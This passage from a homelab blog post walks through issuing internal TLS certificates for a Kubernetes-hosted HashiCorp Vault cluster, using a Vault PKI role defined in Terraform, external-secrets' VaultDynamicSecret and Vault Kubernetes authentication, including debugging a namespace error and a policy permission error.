</span></span><span style="display:flex;"><span>          <span style="color:#f92672">peerASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">eBGPMultihopTTL</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">connectRetryTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">holdTimeSeconds</span>: <span style="color:#ae81ff">90</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">keepAliveTimeSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">gracefulRestart</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">restartTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span></code></pre></div><p>So one policy does the normal thing for all of the Services where I can control
the labels; it applies to my Ceph and worker hosts.
Then there is the second policy, which applies only to the <code>vault</code> Service in
the <code>vault</code> namespace and is bound to my controller nodes. With that configuration,
I got Cilium to announce both of them.</p>
<h2 id="setting-up-the-certificates-for-vault">Setting up the certificates for Vault</h2>
<p>The next step, accounting for the majority of preparation work, was the certificate
setup. The Vault Pods need to be able to access each other, and they should do
it over HTTPS. So they need certificates. Initially, I did not realize that and
naively just told Vault to use my Let&rsquo;s Encrypt external cert. But of course
the Vault instances need to contact each other directly, not just the active
server available via the <code>newvault.example.com</code> address.</p>
<p>So I needed a specific certificate for Vault, with the following three SANs:</p>
<ul>
<li><code>vault-0.vault-internal</code></li>
<li><code>vault-1.vault-internal</code></li>
<li><code>vault-2.vault-internal</code></li>
</ul>
<p>And as I noted above, I&rsquo;ve already got an internal CA. And here is where I
knowingly committed a sin: That CA is provided by Vault, via the
<a href="https://developer.hashicorp.com/vault/docs/secrets/pki">PKI secrets engine</a>.
And I reused that CA for issuing the Vault certificate, thereby introducing a
dependency cycle into my setup. I feel a bit ashamed for it. But I also don&rsquo;t
want to introduce another complete PKI setup. And reusing the already existing
CA has the benefit that the CA cert is already widely deployed in my Homelab.</p>
<p>The first step is to set up a separate <a href="https://developer.hashicorp.com/vault/docs/secrets/pki/quick-start-intermediate-ca#configure-a-role">role</a>
for the certificate, so I can properly separate access to generating certificates
later.</p>
<p>I&rsquo;ve got all of my Vault configuration in Terraform, so I added the new role
there as well. Here is the full CA setup:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_mount&#34; &#34;my-ca-mount&#34;</span> {
</span></span><span style="display:flex;"><span>  path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;my-ca&#34;</span>
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;pki&#34;</span>
</span></span><span style="display:flex;"><span>  default_lease_ttl_seconds <span style="color:#f92672">=</span> <span style="color:#ae81ff">157680000</span>
</span></span><span style="display:flex;"><span>  max_lease_ttl_seconds <span style="color:#f92672">=</span> <span style="color:#ae81ff">157680000</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_pki_secret_backend_root_cert&#34; &#34;my-root-cert&#34;</span> {
</span></span><span style="display:flex;"><span>  backend <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault_mount</span>.<span style="color:#66d9ef">my</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">ca</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">mount</span>.<span style="color:#66d9ef">path</span>
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;internal&#34;</span>
</span></span><span style="display:flex;"><span>  common_name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;My Private Root CA&#34;</span>
</span></span><span style="display:flex;"><span>  ttl <span style="color:#f92672">=</span> <span style="color:#ae81ff">157680000</span>
</span></span><span style="display:flex;"><span>  format <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;pem&#34;</span>
</span></span><span style="display:flex;"><span>  private_key_format <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;der&#34;</span>
</span></span><span style="display:flex;"><span>  key_type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;rsa&#34;</span>
</span></span><span style="display:flex;"><span>  key_bits <span style="color:#f92672">=</span> <span style="color:#ae81ff">4096</span>
</span></span><span style="display:flex;"><span>  exclude_cn_from_sans <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  ou <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Private&#34;</span>
</span></span><span style="display:flex;"><span>  organization <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Private&#34;</span>
</span></span><span style="display:flex;"><span>  country <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;DE&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_pki_secret_backend_config_urls&#34; &#34;my-root-urls&#34;</span> {
</span></span><span style="display:flex;"><span>  backend <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault_mount</span>.<span style="color:#66d9ef">my</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">ca</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">mount</span>.<span style="color:#66d9ef">path</span>
</span></span><span style="display:flex;"><span>  issuing_certificates <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;https://vault.example.com/v1/my-ca/ca&#34;</span>
</span></span><span style="display:flex;"><span>  ]
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_pki_secret_backend_role&#34; &#34;vault-certs&#34;</span> {
</span></span><span style="display:flex;"><span>  backend <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault_mount</span>.<span style="color:#66d9ef">my</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">ca</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">mount</span>.<span style="color:#66d9ef">path</span>
</span></span><span style="display:flex;"><span>  name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vault-certs&#34;</span>
</span></span><span style="display:flex;"><span>  ttl <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;15552000&#34;</span>
</span></span><span style="display:flex;"><span>  max_ttl <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;15552000&#34;</span>
</span></span><span style="display:flex;"><span>  allow_localhost <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  allowed_domains <span style="color:#f92672">=</span> [ <span style="color:#e6db74">&#34;newvault.example.com&#34;, &#34;vault-internal&#34;, &#34;127.0.0.1&#34;</span> ]
</span></span><span style="display:flex;"><span>  allow_subdomains <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  allow_ip_sans <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  allow_wildcard_certificates <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  allow_bare_domains <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  key_type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;rsa&#34;</span>
</span></span><span style="display:flex;"><span>  key_bits <span style="color:#f92672">=</span> <span style="color:#ae81ff">4096</span>
</span></span><span style="display:flex;"><span>  organization <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;My Homelab&#34;</span>]
</span></span><span style="display:flex;"><span>  country <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;DE&#34;</span>]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>There&rsquo;s also another role for certs deployed for other purposes, but that&rsquo;s not
important here. I will not go over the base CA and mount configuration and
instead concentrate on the <code>vault-certs</code> role.</p>
<p>This role allows creating certificates for the <code>vault-internal</code> domain, covering
the three Pods&rsquo; internal DNS names, as well as for the externally visible address of the Vault
cluster that the LoadBalancer points to at <code>newvault.example.com</code>, and for the
localhost address. The localhost IP is there because that&rsquo;s how the <code>vault</code> CLI
launched inside the Pods contacts the local Vault instance, which is needed for
initialization and unsealing later.</p>
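<p>In practice that looks roughly like the following; a sketch, assuming the Helm chart
points the in-Pod <code>vault</code> CLI at the local listener on <code>127.0.0.1</code>:</p>
<pre tabindex="0"><code># Sketch: the CLI inside the Pod talks to the local listener via 127.0.0.1,
# which is why the certificate needs the 127.0.0.1 IP SAN
kubectl -n vault exec -it vault-0 -- vault status
</code></pre>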
<p>This is the beauty of Terraform at work again. I could of course also do the
same using the Vault CLI, but then I would need to document the commands somewhere
and remember to update that documentation whenever something changes. With the
Infrastructure as Code approach, any change goes into this definition,
so it&rsquo;s always up to date.</p>
<p>After a <code>terraform apply</code>, I could produce a certificate with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault write -format<span style="color:#f92672">=</span>json my-ca/issue/vault-certs common_name<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;newvault.example.com&#34;</span> alt_names<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;vault-0.vault-internal,vault-1.vault-internal,vault-2.vault-internal&#34;</span> ttl<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;4000h&#34;</span> &gt; test.cert
</span></span></code></pre></div><p>The JSON file this produces looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;request_id&#34;</span>: <span style="color:#e6db74">&#34;5d72d050-8f80-ba4f-1067-b4165cf2d0f5&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;lease_id&#34;</span>: <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;lease_duration&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;renewable&#34;</span>: <span style="color:#66d9ef">false</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;data&#34;</span>: {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ca_chain&#34;</span>: [
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;-----BEGIN CERTIFICATE-----\n[...]\n-----END CERTIFICATE-----&#34;</span>
</span></span><span style="display:flex;"><span>    ],
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;certificate&#34;</span>: <span style="color:#e6db74">&#34;-----BEGIN CERTIFICATE-----\n [...] \n-----END CERTIFICATE-----&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;expiration&#34;</span>: <span style="color:#ae81ff">1757892246</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;issuing_ca&#34;</span>: <span style="color:#e6db74">&#34;-----BEGIN CERTIFICATE-----\n [...] \n-----END CERTIFICATE-----&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;private_key&#34;</span>: <span style="color:#e6db74">&#34;-----BEGIN RSA PRIVATE KEY-----\n[...]\n-----END RSA PRIVATE KEY-----&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;private_key_type&#34;</span>: <span style="color:#e6db74">&#34;rsa&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;serial_number&#34;</span>: <span style="color:#e6db74">&#34;7d:fe:7e:97:c1:56:96:eb:3d:27:e8:ee:48:78:82:bd:ca:f8:0d:7e&#34;</span>
</span></span><span style="display:flex;"><span>  },
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;mount_type&#34;</span>: <span style="color:#e6db74">&#34;pki&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>And I then revoked this test cert using the <code>serial_number</code> with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault write my-ca/revoke serial_number<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;7d:fe:7e:97:c1:56:96:eb:3d:27:e8:ee:48:78:82:bd:ca:f8:0d:7e&#34;</span>
</span></span></code></pre></div><h3 id="getting-the-certificate-into-kubernetes">Getting the certificate into Kubernetes</h3>
<p>I could then of course just upload the key and certificate into a k8s Secret,
but that doesn&rsquo;t feel very Kubernetes-y, plus it would be a step I would
need to document for future renewals. Instead, I had another look at external-secrets
and found the <a href="https://external-secrets.io/latest/api/generator/vault/">VaultDynamicSecret</a>.</p>
<p>This is another nice feature for getting Vault outputs into k8s Secrets, only
this time it&rsquo;s not static credentials, but a certificate, complete with automatic
renewal. And the usage of the PKI secrets engine is even the example used in the
docs.</p>
<p>I initially deployed a manifest that looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">generators.external-secrets.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">VaultDynamicSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;vault-certs-generator&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;my-ca/issue/vault-certs&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">method</span>: <span style="color:#e6db74">&#34;POST&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">common_name</span>: <span style="color:#e6db74">&#34;newvault.example.com&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">alt_names</span>: <span style="color:#e6db74">&#34;vault-0.vault-internal,vault-1.vault-internal,vault-2.vault-internal&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ip_sans</span>: <span style="color:#e6db74">&#34;127.0.0.1&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resultType</span>: <span style="color:#e6db74">&#34;Data&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">provider</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">server</span>: <span style="color:#e6db74">&#34;https://vault.example.com:8200&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">caProvider</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">Secret</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">homelab-ca-cert</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">namespace</span>: {{ <span style="color:#ae81ff">.Release.Namespace }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">key</span>: <span style="color:#ae81ff">caCert</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">auth</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">appRole</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;approle&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">roleId</span>: {{ <span style="color:#ae81ff">.Values.approleId }}</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;external-secrets-approle&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">namespace</span>: {{ <span style="color:#ae81ff">.Release.Namespace }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;secretId&#34;</span>
</span></span></code></pre></div><p>I deployed this manifest in the external-secrets namespace, because that was
where the <a href="https://developer.hashicorp.com/vault/docs/auth/approle">AppRole</a>
auth secrets lived.</p>
<p>Then I created the following ExternalSecret in the <code>vault</code> namespace to generate
a certificate:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;vault-tls-certs&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;4000h&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vault-tls-certs</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dataFrom</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">sourceRef</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">generatorRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">generators.external-secrets.io/v1alpha1</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">VaultDynamicSecret</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;vault-certs-generator&#34;</span>
</span></span></code></pre></div><p>This didn&rsquo;t work, and I got an error about the <code>vault-certs-generator</code> not
being found. This was because the non-Cluster variants of external-secrets
objects are generally only available in the namespace where they were created.
So my ExternalSecret in the <code>vault</code> namespace wasn&rsquo;t able to access the
VaultDynamicSecret in the external-secrets namespace.</p>
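<p>This is easy to see with kubectl; a sketch, assuming the generator CRD&rsquo;s plural name is
<code>vaultdynamicsecrets</code>:</p>
<pre tabindex="0"><code># Sketch: the generator is namespaced, so it is only visible where it was created
kubectl -n external-secrets get vaultdynamicsecrets.generators.external-secrets.io
kubectl -n vault get vaultdynamicsecrets.generators.external-secrets.io
</code></pre>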
<p>So I ended up moving the ExternalSecret into the external-secrets namespace
as well, just to make sure that it even works. That introduced me to an
authorization error looking something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{<span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;error&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;ts&#34;</span>:<span style="color:#ae81ff">1742423406.4829333</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;Reconciler error&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;controller&#34;</span>:<span style="color:#e6db74">&#34;externalsecret&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;controllerGroup&#34;</span>:<span style="color:#e6db74">&#34;external-secrets.io&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;controllerKind&#34;</span>:<span style="color:#e6db74">&#34;ExternalSecret&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;ExternalSecret&#34;</span>:{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;name&#34;</span>:<span style="color:#e6db74">&#34;vault-tls-certs&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;namespace&#34;</span>:<span style="color:#e6db74">&#34;external-secrets&#34;</span>
</span></span><span style="display:flex;"><span>},
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;namespace&#34;</span>:<span style="color:#e6db74">&#34;external-secrets&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;name&#34;</span>:<span style="color:#e6db74">&#34;vault-tls-certs&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;reconcileID&#34;</span>:<span style="color:#e6db74">&#34;d6b0b369-f959-479a-8228-f9a8d6fbc5bd&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;error&#34;</span>:<span style="color:#e6db74">&#34;error processing spec.dataFrom[0].sourceRef.generatorRef,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">err: error using generator: Error making API request.\n\nURL:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">PUT https://vault.example.com:8200/v1/my-ca/issue/vault-certs
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">Code: 403. Errors:\n\n* 1 error occurred:\n\t* permission denied\n\n&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;stacktrace&#34;</span>:<span style="color:#e6db74">&#34;...&#34;</span>}
</span></span></code></pre></div><p>This was due to a mistake I had made in updating the policy for external-secrets
to allow it access to the <code>my-ca/issue/vault-certs</code> endpoint. The policy addition
I had made for that particular path looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;my-ca/issue/vault-certs&#34;</span> {
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [ <span style="color:#e6db74">&#34;create&#34;</span> ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>That&rsquo;s what all the examples I could find said. But it did not work. I finally
added all capabilities and then slowly removed them one by one,
until I found that the only thing missing from the above was the <code>update</code> capability.</p>
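<p>For reference, this is the version that ended up working; a sketch using the Vault CLI,
where the policy name <code>external-secrets</code> is made up:</p>
<pre tabindex="0"><code># Sketch: the path block that ended up working, with both create and update
vault policy write external-secrets - &lt;&lt;&#39;EOF&#39;
path &#34;my-ca/issue/vault-certs&#34; {
  capabilities = [ &#34;create&#34;, &#34;update&#34; ]
}
EOF
</code></pre>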
<p>After fixing that I finally got a certificate created. But I still had to do
something about the fact that the ExternalSecret lived in the external-secrets
namespace now, while it was needed in Vault&rsquo;s namespace.</p>
<p>One option I looked at to resolve this issue is <a href="https://external-secrets.io/latest/api/generator/cluster/">ClusterGenerators</a>.
These work similarly to namespaced generators like VaultDynamicSecret, but can be
used by ExternalSecrets throughout the cluster.
I ended up deciding against that, for simple &ldquo;doing things properly&rdquo; reasons:
The generator will only ever be needed in the Vault namespace, because it is not
a generic generator for TLS certs, but a specific generator restricted to creating
certs for Vault.</p>
<p>So I decided to stay with the namespaced VaultDynamicSecret, but change the
auth method to Kubernetes.</p>
<h3 id="setting-up-kubernetes-auth">Setting up Kubernetes auth</h3>
<p>Being the Swiss army knife that it is, Vault can also authenticate clients via
<a href="https://developer.hashicorp.com/vault/docs/auth/kubernetes">Kubernetes</a>.
The way this works is that you create a role in Vault and assign policies
defining what that role can do. Then, certain Kubernetes ServiceAccounts can be
allowed to authenticate with that role. During login, the client presents a
Kubernetes ServiceAccount JWT, and Vault checks with the Kubernetes API that the
token is valid and belongs to one of the ServiceAccounts allowed to use the
Vault role.</p>
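<p>To make the flow a bit more concrete, this is roughly what such a login looks like
when done by hand from inside a Pod running under an allowed ServiceAccount. The
mount path and role name match my setup further below; this is just a sketch, as
the actual login is done by external-secrets itself:</p>
<pre tabindex="0"><code># Manual version of the login that external-secrets performs automatically.
# Run from inside a Pod whose ServiceAccount is allowed to use the role.
JWT=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
vault write auth/kubernetes/login role=vault-certs jwt=&#34;$JWT&#34;
# On success, Vault returns a client token with the policies bound to the role.
</code></pre>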
<p>One problem is that the action of verifying Kubernetes tokens itself also needs
a Kubernetes token for the API server access. With a Vault deployed via the
Helm chart that&rsquo;s easy, the <code>vault</code> ServiceAccount created by the chart already
has the necessary permissions, and Vault can use that account&rsquo;s token.
Vault will also automatically reload the token periodically, as Kubernetes
tokens are generally short-lived.</p>
<p>But at least initially, I need to use my baremetal Vault for the certificate
generation, because those are the certs that the k8s Vault deployment will use
later. To work around this issue, one could still use long-lived tokens. But
another way would be to use the JWT of the process that&rsquo;s trying to use the
Vault auth method. This requires some changes in Kubernetes though. Namely, the
ServiceAccounts which should authenticate to Vault via Kubernetes auth need to have
the <code>system:auth-delegator</code> ClusterRole. This allows other apps (here, Vault) to use
the ServiceAccount&rsquo;s token to call the <a href="https://kubernetes.io/docs/reference/kubernetes-api/authentication-resources/token-review-v1/">TokenReview</a>
API and verify that the presented token is valid.
No change is necessary here, because the <code>vault</code> ServiceAccount I will be using
already has the <code>auth-delegator</code> role.</p>
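<p>For a ServiceAccount that does not have that role yet, granting it would look
roughly like this (the binding name is made up; the ServiceAccount is <code>vault</code> in
the <code>vault</code> namespace):</p>
<pre tabindex="0"><code># Bind the system:auth-delegator ClusterRole to the vault ServiceAccount,
# so Vault can use its token to call the TokenReview API.
kubectl create clusterrolebinding vault-token-review \
  --clusterrole=system:auth-delegator \
  --serviceaccount=vault:vault
</code></pre>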
<p>So with that out of the way, here is the Vault Kubernetes auth setup:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_auth_backend&#34; &#34;kubernetes&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;kubernetes&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_kubernetes_auth_backend_config&#34; &#34;kube-backend-config&#34;</span> {
</span></span><span style="display:flex;"><span>  backend                <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault_auth_backend</span>.<span style="color:#66d9ef">kubernetes</span>.<span style="color:#66d9ef">path</span>
</span></span><span style="display:flex;"><span>  kubernetes_host        <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://k8s.exmaple.com:6443&#34;</span>
</span></span><span style="display:flex;"><span>  issuer                 <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;api&#34;</span>
</span></span><span style="display:flex;"><span>  disable_iss_validation <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  kubernetes_ca_cert               <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;-----BEGIN CERTIFICATE-----\n [...]&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_kubernetes_auth_backend_role&#34; &#34;vault-certs&#34;</span> {
</span></span><span style="display:flex;"><span>  backend                          <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault_auth_backend</span>.<span style="color:#66d9ef">kubernetes</span>.<span style="color:#66d9ef">path</span>
</span></span><span style="display:flex;"><span>  role_name                        <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vault-certs&#34;</span>
</span></span><span style="display:flex;"><span>  bound_service_account_names      <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;vault&#34;</span>]
</span></span><span style="display:flex;"><span>  bound_service_account_namespaces <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;vault&#34;</span>]
</span></span><span style="display:flex;"><span>  token_ttl                        <span style="color:#f92672">=</span> <span style="color:#ae81ff">3600</span>
</span></span><span style="display:flex;"><span>  token_policies                   <span style="color:#f92672">=</span> [<span style="color:#66d9ef">vault_policy</span>.<span style="color:#66d9ef">vault</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">certs</span>.<span style="color:#66d9ef">name</span>]
</span></span><span style="display:flex;"><span>  token_bound_cidrs                <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;300.300.300.0/24&#34;</span>]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>In this setup, the Kubernetes auth is created for the k8s API at <code>k8s.example.com:6443</code>.
The general k8s info can be found via this command:</p>
